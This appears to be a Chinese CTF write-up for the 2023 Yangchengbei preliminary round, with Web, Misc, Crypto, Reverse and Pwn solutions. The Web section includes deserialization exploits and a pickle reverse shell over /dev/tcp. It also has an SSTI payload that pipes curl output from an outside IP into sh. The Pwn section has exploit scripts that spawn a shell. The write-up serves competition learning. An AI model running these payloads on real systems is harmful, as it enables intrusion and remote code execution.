2023“羊城杯”网络安全大赛初赛-WriteUp By EDISEC

admin

136479
文章

111
评论

2023年9月9日16:20:56评论229 views字数 32900阅读109分40秒阅读模式

EDI

JOIN US ▶▶▶

Web

D0n't pl4y g4m3!!!

PHP<=7.4.21 Development Server源码泄露漏洞

https://cloud.tencent.com/developer/article/2235691

<?phpheader("HTTP/1.1 302 found");header("Location:https://passer-by.com/pacman/");
class Pro{    private $exp;    private $rce2;
    public function __get($name)    {        return $this->$rce2=$this->exp[$rce2];    }    public  function __toString()    {            call_user_func('system', "cat /flag");     }}
class Yang{    public function __call($name, $ary)    {        if ($this->key === true || $this->finish1->name) {            if ($this->finish->finish) {                call_user_func($this->now[$name], $ary[0]);            }        }    }    public function ycb()    {        $this->now = 0;        return $this->finish->finish;    }    public function __wakeup()    {        $this->key = True;    }}class Cheng{    private $finish;    public $name;    public function __get($value)    {
        return $this->$value = $this->name[$value];    }}class Bei{    public function __destruct()    {        if ($this->CTF->ycb()) {            $this->fine->YCB1($this->rce, $this->rce1);        }    }    public function __wakeup()    {        $this->key = false;    }}
function prohib($a){    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";    return preg_replace($filter,'',$a);}
$a = $_POST["CTF"];if (isset($a)){  unserialize(prohib($a));}?>

hint.zip内容是

那么源码的call_user_func('system', "cat /flag");就是陷阱，出口应该是call_user_func($this->now[$name], $ary[0]);

构造反序列化链

入口是

Bei::__destruct

$this->CTF->ycb()进到ycb()

Cheng的$finish是private，调用__get，令finish=true

回到Bei

$this->fine->YCB1($this->rce, $this->rce1);调用了Yang中不存在的方法，触发__call并触发__wakeup令$this->key = True;通过if，执行命令。

payload：

O:3:"Bei":3:{s:4:"fine";O:4:"Yang":2:{s:6:"finish";O:5:"Cheng":2:{s:13:"x00Chengx00finish";N;s:4:"name";a:1:{s:6:"finish";s:4:"true";}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:23:"cat /tmp/catcatf1ag.txt";s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"x00Chengx00finish";N;s:4:"name";a:1:{s:6:"finish";s:4:"true";}}}}

Ez_java

利用pojonode执行htmlbean中的getHtmlMap，在利用代理类代理HtmlMap，最后成功执行文件上传。

https://www.cnblogs.com/escape-w/p/17326592.html

将content设置为public String content = "<#assign ac=springMacroRequestContext.webApplicationContext>n" +           "  <#assign fc=ac.getBean('freeMarkerConfiguration')>n" +           "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>n" +           "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${"freemarker.template.utility.Execute"?new()("cat /flag")}n";

exp

package com.ycbjava.test;import com.fasterxml.jackson.databind.node.POJONode;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.ycbjava.Bean.HtmlBean;import com.ycbjava.Utils.HtmlInvocationHandler;import com.ycbjava.Utils.HtmlMap;import javassist.ClassPool;import javassist.CtClass;import javassist.CtConstructor;import org.springframework.http.HttpEntity;import org.springframework.http.HttpHeaders;import org.springframework.http.ResponseEntity;import org.springframework.web.client.RestTemplate;
import javax.management.BadAttributeValueExpException;import java.io.*;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.net.URI;import java.security.*;import java.util.Base64;import java.util.Map;
public class exp {    public static void main(String[] args) throws Exception {        HtmlMap expMap = new HtmlMap();        Class c = Class.forName("com.ycbjava.Utils.HtmlInvocationHandler");        Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Map.class);        annotationInvocationhdlConstructor.setAccessible(true);        InvocationHandler h = (InvocationHandler) annotationInvocationhdlConstructor.newInstance(expMap);//动态代理        Map mapProxy = (Map) Proxy.newProxyInstance(expMap.getClass().getClassLoader(),new Class[]{Map.class},h);
//        c = HtmlBean.class;//        Constructor constructor = c.getDeclaredConstructor(Map.class,String.class,String.class);//        constructor.setAccessible(true);//        HtmlBean templatesImpl = (HtmlBean) constructor.newInstance(mapProxy,"","");        HtmlMap tmpMap = new HtmlMap();        HtmlBean templatesImpl = new HtmlBean(tmpMap,"","");        templatesImpl.setHtmlMap(mapProxy);        POJONode jsonNodes = new POJONode(templatesImpl);        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");        val.setAccessible(true);        val.set(exp, jsonNodes);        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);        objectOutputStream.writeObject(exp);        FileOutputStream fout = new FileOutputStream("1.ser");        fout.write(barr.toByteArray());        fout.close();        FileInputStream fileInputStream = new FileInputStream("1.ser");        System.out.println(serial(exp));        deserial(serial(exp));    }    public static String serial(Object o) throws IOException, NoSuchFieldException {        ByteArrayOutputStream baos = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(baos);        oos.writeObject(o);        oos.close();
        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());        return base64String;
    }
    public static void deserial(String data) throws Exception {        byte[] base64decodedBytes = Base64.getDecoder().decode(data);        ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);        ObjectInputStream ois = new ObjectInputStream(bais);        ois.readObject();        ois.close();    }
    private static void Base64Encode(ByteArrayOutputStream bs){        byte[] encode = Base64.getEncoder().encode(bs.toByteArray());        String s = new String(encode);        System.out.println(s);        System.out.println(s.length());    }    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{        Field f = obj.getClass().getDeclaredField(field);        f.setAccessible(true);        f.set(obj, arg);    }}

HtmlMap

//// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//
package com.ycbjava.Utils;
import java.io.Serializable;import java.util.Collection;import java.util.Map;import java.util.Set;
public class HtmlMap implements Map, Serializable {   public String filename = "index.ftl";   public String content = "<#assign ac=springMacroRequestContext.webApplicationContext>n" +           "  <#assign fc=ac.getBean('freeMarkerConfiguration')>n" +           "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>n" +           "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${"freemarker.template.utility.Execute"?new()("cat /flag")}n";
   public HtmlMap() {   }
   public int size() {      return 0;   }
   public boolean isEmpty() {      return false;   }
   public boolean containsKey(Object key) {      return false;   }
   public boolean containsValue(Object value) {      return false;   }
   public Object get(Object key) {      try {         Object obj = HtmlUploadUtil.uploadfile(this.filename, this.content);         return obj;      } catch (Exception var4) {         throw new RuntimeException(var4);      }   }
   public Object put(Object key, Object value) {      return null;   }
   public Object remove(Object key) {      return null;   }
   public void putAll(Map m) {   }
   public void clear() {   }
   public Set keySet() {      return null;   }
   public Collection values() {      return null;   }
   public Set<Map.Entry> entrySet() {      return null;   }}

Serpent

www.zip

伪造jwt

替换session后访问，下一步

看到hint

拿到源码

@app.route('/src0de')def src0de():    f = open(__file__, 'r')    rsp = f.read()    f.close()    return rsp[rsp.index("@app.route('/src0de')"):]
@app.route('/ppppppppppick1e')def ppppppppppick1e():    try:        username = "admin"        rsp = make_response("Hello, %s " % username)        rsp.headers['hint'] = "Source in /src0de"        pick1e = request.cookies.get('pick1e')        if pick1e is not None:            pick1e = base64.b64decode(pick1e)        else:            return rsp        if check(pick1e):            pick1e = pickle.loads(pick1e)            return "Go for it!!!"        else:            return "No Way!!!"    except Exception as e:        error_message = str(e)        return error_message
    return rsp
class GWHT():    def __init__(self):        pass
if __name__ == '__main__':    app.run('0.0.0.0', port=80)

构造pickle反序列化，拿到flag

payload：

import base64c = b'''(cossystemS'bash -c "bash -i >& /dev/tcp/123/777 0>&1"'o.'''print(base64.b64encode(c))

ezyaml

PyYaml反序列化打不通，发现tar解压可以目录穿越

payload：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('curl http://139.159.163.195:8080/1|sh').read()") }}{% endif %}{% endfor %}

写反弹shell的payload

tar cPvf 5x.tar ../../templates/result.html

然后直接上传5x.tar

ArkNights

非预期，直接读/proc/1/environ

payload：

url/read?file=/proc/1/environ

Misc

ai和nia的交响曲

pcap包提取flag1.png和flag2.zip

flag1.png直接二进制转字符

flag1.png 二维码转01，然后转字符串

from PIL import Image
# 打开图像文件image = Image.open('./flag1.png')
# 将图像转换为RGB模式（如果不是的话）image = image.convert('RGB')
# 获取图像的宽度和高度width, height = image.size
# 遍历每个像素并获取其RGB值with open("flag.txt", "w") as f:    for y in range(height):        for x in range(width):            r, g, b = image.getpixel((y, x))            if r > 200:                f.write(f'1')            else:                f.write(f'0')

HINT:BV1wW4y1R7Jv&&FLAG1:@i_n1a_l0v3S_

flag2.zip是伪加密

解密后直接看txt中的数字对应HINT中视频的秒数

其实可以猜测出来为CAOCAOGAIFAN（曹操盖饭

flag: @i_n1a_l0v3S_CAOCAOGAIFAN

GIFUCK

获取图片后，先找个网站分离惹

根据特征像素写脚本获取字符

一开始直接跑brainfuck不行，后觉得应把 GIF图片时间间隔/60 x 字符类型统计为一串完整的字符。

from PIL import Imageimport matplotlibtime=[0,240,60,60,60,240,60,60,60,60,60,60,360,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,1860,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,120,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,120,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,120,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,540,60,60,60,540,60,60,60,120,60,60,300,60,60,60,300,60,60,60,180,60,180,120,420,60,60,540,60,60,60,540,60,60,60,480,60,60,480,60,60,60,480,60,60,60,120,60,60,240,60,60,60,240,60,60,60,180,60,60,60,60,540,60,60,60,540,60,60,60,180,60,60,540,60,60,60,540,60,60,60,480,60,60,180,60,60,60,180,60,60,60,60,60,360,60,180,60,60,540,60,60,60,540,60,60,60,60,60,60,480,60,60,60,480,60,60,60,360,60,360,60,60,180,60,60,60,180,60,60,60,120,60,360,60,60,480,60,60,60,480,60,60,60,420,60,60,480,60,60,60,480,60,60,60,540,60,60,180,60,60,60,180,60,60,60,60,60,60,540,60,60,60,540,60,60,60,120,60,60,480,60,60,60,480,60,60,60,840,60,60,60,300,60,60,540,60,60,60,540,60,60,60,180,60,60,480,60,60,60,480,60,60,60,480,60,180,60,60,180,60,60,60,180,60,60,60,240,60,60,180,60,60,60,180,60,60,60,240,60,60,420,60,60,60,420,60,60,60,360,60,60,60,60,60]c=""print(len(time))for i in range(1,1100):    img=Image.open("flag_{}.jpeg".format(i))    if(img.getpixel((20,12))[0]==0 and img.getpixel((20,12))[1]==0 and img.getpixel((20,12))[2]==0):        c+='['*(time[i]//60)    elif(img.getpixel((26,12))[0]==0 and img.getpixel((26,12))[1]==0 and img.getpixel((26,12))[2]==0):        c+="]"*(time[i]//60)    elif (img.getpixel((31,15))[0] == 0 and img.getpixel((31,15))[1] == 0 and img.getpixel((31,15))[2] == 0):        c += "<"*(time[i]//60)    elif(img.getpixel((16,14))[0]==0 and img.getpixel((16,14))[1]==0 and img.getpixel((16,14))[2]==0):        c+=">"*(time[i]//60)    elif(img.getpixel((16,24))[0]==0 and img.getpixel((16,24))[1]==0 and img.getpixel((16,24))[2]==0 and img.getpixel((24,18))[0]==0 and img.getpixel((24,18))[1]==0 and img.getpixel((24,18))[2]==0):        c+="+"*(time[i]//60)    elif(img.getpixel((25,25))[0]==0 and img.getpixel((25,25))[1]==0 and img.getpixel((25,25))[2]==0 and img.getpixel((30,23))[0]==0 and img.getpixel((30,23))[1]==0 and img.getpixel((30,23))[2]==0):        c+="-"*(time[i]//60)    else:        c+='.'*(time[i]//60)print(c)print(len(c))

则提取出完整的brainfuck代码，但是提示

“Sorry flag is not here”

猜测存在栈上（此处@2021长城杯Misc[你这flag保熟吗]

在正常字符前下断点

用Esoteric IDE跑即得到flag

DASCTF{Pen_Pineapple_Apple_Pen}

Easy_VMDK

1、根据题目提示，压缩包压缩了，但是没有变小，说明是仅存储压缩，其次，vmdk数据包前12个字节刚好是固定的，所以可以用明文攻击进行爆破密钥。

2、爆破出密钥

[ e6a73d9f 21ccfdbc f3e0c61c ]

3、将vmdk拖到取证工具一把梭，得到一个key.txt和一个flag.zip

4、flag.zip中藏了一个zip里面内容是

5、根据所给脚本写逆回去的脚本，得到压缩包密码

import cv2import base64import binasciiimport numpy as np
height, width = 137, 2494image = np.zeros((width, height, 3), dtype=np.uint8)print(image.shape)

r = 0 # 137c = 0 # 2494
with open("key.txt", "r") as f:    lines = f.readlines()    print(len(lines))    for line in lines:        text = base64.b64decode(line.strip())        img = binascii.b2a_uu(text).strip().decode().split(", ")        rgb_values = [int(x) for x in img]        rgb_tuple = tuple(rgb_values)        print(rgb_tuple)        image[c, r] = rgb_tuple        c += 1        if c == 2494:            r += 1            c = 0        if r > 137:            break        # print(img)
cv2.imwrite("key.png", image)

HELLO_DASCTF2023_WORLD

6、得到flag

ez_misc

window11截图漏洞

crc爆破，修改长宽

github下载工具，放入工具。

Crypto

MCeorpkpleer

部分p+超递增背包

from sage.numerical.knapsack import Superincreasing
p = 139540788452365306201344680691061363403552933527922544113532931871057569249632300961012384092481349965600565669315386312075890938848151802133991344036696488204791984307057923179655351110456639347861739783538289295071556484465877192913103980697449775104351723521120185802327587352171892429135110880845830815744n = 22687275367292715121023165106670108853938361902298846206862771935407158965874027802803638281495587478289987884478175402963651345721058971675312390474130344896656045501040131613951749912121302307319667377206302623735461295814304029815569792081676250351680394603150988291840152045153821466137945680377288968814340125983972875343193067740301088120701811835603840224481300390881804176310419837493233326574694092344562954466888826931087463507145512465506577802975542167456635224555763956520133324723112741833090389521889638959417580386320644108693480886579608925996338215190459826993010122431767343984393826487197759618771c = 156879727064293983713540449709354153986555741467040286464656817265584766312996642691830194777204718013294370729900795379967954637233360644687807499775502507899321601376211142933572536311131955278039722631021587570212889988642265055045777870448827343999745781892044969377246509539272350727171791700388478710290244365826497917791913803035343900620641430005143841479362493138179077146820182826098057144121231954895739989984846588790277051812053349488382941698352320246217038444944941841831556417341663611407424355426767987304941762716818718024107781873815837487744195004393262412593608463400216124753724777502286239464pubkey = [18143710780782459577, 54431132342347378731, 163293397027042136193, 489880191081126408579, 1469640573243379225737, 4408921719730137677211, 13226765159190413031633, 39680295477571239094899, 119040886432713717284697, 357122659298141151854091, 1071367977894423455562273, 3214103933683270366686819, 9642311801049811100060457, 28926935403149433300181371, 86780806209448299900544113, 260342418628344899701632339, 781027255885034699104897017, 2343081767655104097314691051, 7029245302965312291944073153, 21087735908895936875832219459, 63263207726687810627496658377, 189789623180063431882489975131, 569368869540190295647469925393, 1708106608620570886942409776179, 601827224419797931380408071500, 1805481673259393794141224214500, 893952418336266652976851386463, 2681857255008799958930554159389, 3523079163584485147344841221130, 1524252287869625983140881149316, 50264262166963219975822190911, 150792786500889659927466572733, 452378359502668979782399718199, 1357135078508006939347199154597, 4071405235524020818041597463791, 3169230503688232995231149877299, 462706308180869526799807117823, 1388118924542608580399421353469, 4164356773627825741198264060407, 3448085117999647764701149667147, 1299270151115113835209806487367, 3897810453345341505629419462101, 2648446157152195057994615872229, 3422845870014670444537026359650, 1223552407160181874717436564876, 3670657221480545624152309694628, 1966986461557807413563286569810, 1378466783231507511243038452393, 4135400349694522533729115357179, 3361215846199738142293703557463, 1038662335715384967987468158315, 3115987007146154903962404474945, 302975818554635252993570910761, 908927455663905758980712732283, 2726782366991717276942138196849, 3657854499533237101379593333510, 1928578295715881845245137486456, 1263242285705730806288591202331, 3789726857117192418865773606993, 2324195368467747797703678306905, 2450093503961328663664213663678, 2827787910442071261545819733997, 3960871129884299055190637944954, 2837628186769067706678271320788]en_e = 31087054322877663244023458448558
PR.<x>=Zmod(n)[]f=p+xps=f.small_roots(X=2^435,beta=0.4)[0]p=p+ZZ(ps)q=n//p
w=pubkey[0]m=pubkey[23]*3-pubkey[24]e_sum=inverse_mod(w,m)*en_e%mL = [pow(3, i) for i in range(len(pubkey))]s=Superincreasing(L).subset_sum(e_sum)e_bin=''for i in L:    if i in s:        e_bin+='1'    else:        e_bin+='0'
e=int(e_bin,2)d=inverse_mod(e,(p-1)*(q-1))m=pow(c,d,n)print(bytes.fromhex(hex(m)[2:]))

Easy_3L

from Crypto.Util.number import *

S1 = 28572152986082018877402362001567466234043851789360735202177142484311397443337910028526704343260845684960897697228636991096551426116049875141S2 = 1267231041216362976881495706209012999926322160351147349200659893781191687605978675590209327810284956626443266982499935032073788984220619657447889609681888S4 = 9739918644806242673966205531575183334306589742344399829232076845951304871478438938119813187502023845332528267974698273405630514228632721928260463654612997S5 = 9755668823764800147393276745829186812540710004256163127825800861195296361046987938775181398489372822667854079119037446327498475937494635853074634666112736p = 25886434964719448194352673440525701654705794467884891063997131230558866479588298264578120588832128279435501897537203249743883076992668855905005985050222145380285378634993563571078034923112985724204131887907198503097115380966366598622251191576354831935118147880783949022370177789175320661630501595157946150891275992785113199863734714343650596491139321990230671901990010723398037081693145723605154355325074739107535905777351h = 2332673914418001018316159191702497430320194762477685969994411366563846498561222483921873160125818295447435796015251682805613716554577537183122368080760105458908517619529332931042168173262127728892648742025494771751133664547888267249802368767396121189473647263861691578834674578112521646941677994097088669110583465311980605508259404858000937372665500663077299603396786862387710064061811000146453852819607311367850587534711c = 20329058681057003355767546524327270876901063126285410163862577312957425318547938475645814390088863577141554443432653658287774537679738768993301095388221262144278253212238975358868925761055407920504398004143126310247822585095611305912801250788531962681592054588938446210412897150782558115114462054815460318533279921722893020563472010279486838372516063331845966834180751724227249589463408168677246991839581459878242111459287
M=matrix(ZZ,2,2)M[0,0]=1M[0,1]=hM[1,1]=pf,q=M.LLL()f=abs(f)q=abs(q)
f=2958625475884682403405014470761000210086580211925778089178918430815532447031463283614057163768060620823591903413541344968843101811848989638106999025589699093227724370590844533541264661014288260713331275996479822           q=143265706312185518707360965653484385997990911723976280223660311623608293086933108010191106789268178340653420902857329654860207182679342550588469606976658133500469022125616655674540322895098388733565812347250745a=(c*f%p)S3=inverse_mod(f,q)*a%qS3=ZZ(S3)
t1=S2-S1t2=S3-S2t3=S4-S3t4=S5-S4
n=GCD(t1*t3-t2^2,t2*t4-t3^2)a=t2*inverse_mod(t1,n)%na=ZZ(a)b=ZZ((S2-a*S1)%n)
S0=(S1-b)*inverse_mod(a,n)%nprint(long_to_bytes(S0))

Danger_RSA

from Crypto.Util.number import *import sympyimport gmpy2
N = 20289788565671012003324307131062103060859990244423187333725116068731043744218295859587498278382150779775620675092152011336913225797849717782573829179765649320271927359983554162082141908877255319715400550981462988869084618816967398571437725114356308935833701495015311197958172878812521403732038749414005661189594761246154666465178024563227666440066723650451362032162000998737626370987794816660694178305939474922064726534186386488052827919792122844587807300048430756990391177266977583227470089929347969731703368720788359127837289988944365786283419724178187242169399457608505627145016468888402441344333481249304670223e = 11079917583c = 13354219204055754230025847310134936965811370208880054443449019813095522768684299807719787421318648141224402269593016895821181312342830493800652737679627324687428327297369122017160142465940412477792023917546122283870042482432790385644640286392037986185997262289003477817675380787176650410819568815448960281666117602590863047680652856789877783422272330706693947399620261349458556870056095723068536573904350085124198592111773470010262148170379730937529246069218004969402885134027857991552224816835834207152308645148250837667184968030600819179396545349582556181916861808402629154688779221034610013350165801919342549766s=21 * 5741t=e//s
XY=gmpy2.iroot(N,4)[0]a=N-XY**4-ex=sympy.Symbol('x')r=sympy.solve([t*x**8-a*x**4+s*XY**4],[x])X=r[1][0]p=int(X**4+s)d=inverse(e,p-1)m=pow(c,int(d),p)print(e*d%(p-1))

PR.<x>=GF(p)[]f=x^3-mfor i in f.roots():    print(long_to_bytes(ZZ(i[0])))

XOR贯穿始终

找到n和d分别是证书16进制前两次02 81 81后的0x81个字节

from Crypto.Util.number import *from pwn import *
n=0x00B9AD332FB6B87D59B5B20B4AE880BA416D8724111F99A9ED498BCB365091D83DCC43FDFF9B607DF8A443BCADC79907C921E76B38003B5B0ECE660437803195EBFAB9A7E23FC0751228FDEEFE5591827523D7B79AD04D85E4DB5CAA13F28A7E0124357D0685E00F14CCBB9679979923C2531FF487F9BA2500ADE48995C315D913d=0x00974EBB2DA0BB0AFB3603970C3E17D8B044AF22070A3750B05B849DDEEF1D4A986182EED3832CC8BAFC316EEA36835042E96C0A85A23ABC637E72C7F0EA787DF06127FE9DC3D21B8DAE8018BDFFC345107D5271DDB6D5FBC01F8CBF73F44410D61E006208356F1C5B85515EFC708B34B676E78F18D4D3B68F5765D10B701F0361e=65537c = 91817924748361493215143897386603397612753451291462468066632608541316135642691873237492166541761504834463859351830616117238028454453831120079998631107520871612398404926417683282285787231775479511469825932022611941912754602165499500350038397852503264709127650106856760043956604644700201911063515109074933378818m=pow(c,d,n)m=long_to_bytes(m)key=b'C0ngr4tulati0n5_y0u_fou^d_m3'print(m[:-28]+xor(key,m[-28:]))

blast

md5(md5($pass))

CSGO

BASE64换表动调

ez加密器

import base64import structfrom Crypto.Cipher import DESraw_table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='new_table = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/='dictionary_decode = str.maketrans(new_table, raw_table)dictionary_encode = dict(zip(dictionary_decode.values(),dictionary_decode.keys()))ciphertext = bytes.fromhex('0723105D5C12217DCDC3601F5ECB54DA9CCEC2279F1684A13A0D716D17217F4C9EA85FF1A42795731CA3C55D3A4D7BEA')for i in range(999999):    result_b64 = base64.b64encode(str(i).encode()).decode()    new_result_b64 = result_b64.translate(dictionary_encode)    key = new_result_b64[:8]    if len(key) >= 8:        try:             cipher = DES.new(key.encode(), DES.MODE_ECB)            plaintext = cipher.decrypt(ciphertext)            if "DASCTF" in plaintext.decode():                print(plaintext)                break        except:            continueDASCTF{f771b96b71514bb6bc20f3275fa9404e}

vm_wo

整体加密就是异或0x2b，整体左移1位 + 1，比较好猜。

Pwn

cookieBox

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./cookieBox'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/musl/1.1.24/amd64/lib/libc.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('tcp.cloud.dasctf.com',24659)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)
    def choice(a):      io.sendlineafter('>>',str(a))
    def add(a,b):      choice(1)      io.sendlineafter('size:n',str(a))      io.sendafter('Content:n',b)      def edit(a,b):      choice(3)      io.sendlineafter('idx:n',str(a))      io.sendafter('content:n',b)
    def show(a):      choice(4)      io.sendlineafter('idx:n',str(a))
    def delete(a):      choice(2)      io.sendlineafter('idx:n',str(a))
    add(0x40,'aaaaaaaa')    add(0x40,'aaaaaaaa')    add(0x40,'aaaaaaaa')    add(0x40,'aaaaaaaa')    add(0x90,'aaaaaaaa')    delete(2)    add(0x40,'aaaaaaaa')    show(5)
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['mal']-0x30    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    pop_rax_ret=libc.search(asm('pop rax;ret')).next()    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()    syscall_ret=libc.search(asm('syscall;ret')).next()
    delete(2)    edit(5,p64(0x602070)+p64(0x602070+8))    delete(3)    edit(5,p64(libc.sym['__stdout_FILE'])*2)    fake_file = ""    fake_file += "/bin/sh".ljust(8, 'x00')  # flags    fake_file += p64(0)  # rpos    fake_file += p64(0)  # rend    fake_file += p64(0)  # close    fake_file += p64(0)  # wend    fake_file += p64(114514)  # wpos    fake_file += p64(0)  # mustbezero_1    fake_file += p64(1919810)  # wbase    fake_file += p64(0)  # read    fake_file += p64(system_addr)  # write
    edit(4,fake_file)

        success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))
    gdb_attach(io,gdb_text)    io.interactive()
  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

easy_vm

#coding:utf-8from pwn import *
context.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''b exit  '''
if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :  io=remote('tcp.cloud.dasctf.com',24486)  gdb_open=0  libc=ELF('./libc-2.23.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)    sleep(0.2)
def pop():  return p64(2)
def push():  return p64(1)
def mov():  return p64(3)
def data_add(a):  return p64(6)+p64(a)
def data_sub(a):  return p64(7)+p64(a)


bin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']pop_rax_ret=libc.search(asm('pop rax;ret')).next()pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()syscall_ret=libc.search(asm('syscall;ret')).next()

gdb_attach(io,gdb_text)pay=pop()+push()*4+data_sub(libc.sym['__malloc_hook']+0x10+88)+push()pay+=data_add(0xf1147)+push()+data_add(0x5abbb8+system_addr-0xf1147)+mov()pay+=pop()



io.recv()io.send(pay)

io.interactive()

shellcode

通过已有0x10长度的shellcode，完成二次read，而后再构造orw，来绕过沙箱。

